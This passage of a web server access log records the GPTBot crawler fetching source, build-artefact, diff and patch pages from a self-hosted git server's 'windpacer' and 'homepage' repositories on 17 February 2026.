like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/index.html" -[17/Feb/2026:13:15:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:15:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 11000] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:15:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10998] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:15:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/types.ts" -[17/Feb/2026:13:15:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/App.tsx" -[17/Feb/2026:13:15:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.tsx" -[17/Feb/2026:13:15:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/README.md" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/README.md" -[17/Feb/2026:13:15:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10999] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:15:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets" [Client 74.7.227.38] [Length 10094] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets" -[17/Feb/2026:13:15:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 9959] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:13:15:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/README.md" -[17/Feb/2026:13:15:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 8597989] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:13:15:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 17184] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:13:15:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 48960] [Gzip 17.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:13:15:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 3141] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:13:15:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9982] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:13:15:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 22899] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:13:15:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 9544] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:13:15:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 18353] [Gzip 11.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:13:15:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 3636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:13:15:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:13:15:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12516] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/App.tsx" -[17/Feb/2026:13:15:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9982] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:13:15:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/App.tsx" -[17/Feb/2026:13:15:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/types.ts" [Client 74.7.227.38] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/types.ts" -[17/Feb/2026:13:15:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/index.html" [Client 74.7.227.38] [Length 2884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/index.html" -[17/Feb/2026:13:15:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12939] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services/geminiService.ts" -[17/Feb/2026:13:15:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10983] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:15:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=.Backup" [Client 74.7.227.38] [Length 106378] [Gzip 10.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup" -[17/Feb/2026:13:15:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services/geminiService.ts" -[17/Feb/2026:13:15:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js" [Client 74.7.227.38] [Length 10047] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets" -[17/Feb/2026:13:15:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 10961] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:15:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/services" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" -[17/Feb/2026:13:15:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10999] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:15:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components" [Client 74.7.227.38] [Length 10601] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" -[17/Feb/2026:13:15:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services/geminiService.ts" -[17/Feb/2026:13:15:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13142] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services" -[17/Feb/2026:13:15:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d.diff" [Client 74.7.227.38] [Length 160] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d" -[17/Feb/2026:13:15:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9972] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:13:15:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10935] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:13:15:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 287] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:13:16:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c.patch" [Client 74.7.227.38] [Length 58749428] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" -[17/Feb/2026:13:16:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 9967] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:13:16:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 880569] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:13:16:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 1752073] [Gzip 24.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:13:16:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1069] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:13:16:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c.diff" [Client 74.7.227.38] [Length 524367] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" -[17/Feb/2026:13:16:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12938] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services/geminiService.ts" -[17/Feb/2026:13:16:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services/geminiService.ts" -[17/Feb/2026:13:16:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services/geminiService.ts" -[17/Feb/2026:13:16:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea.diff" [Client 74.7.227.38] [Length 1832] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, 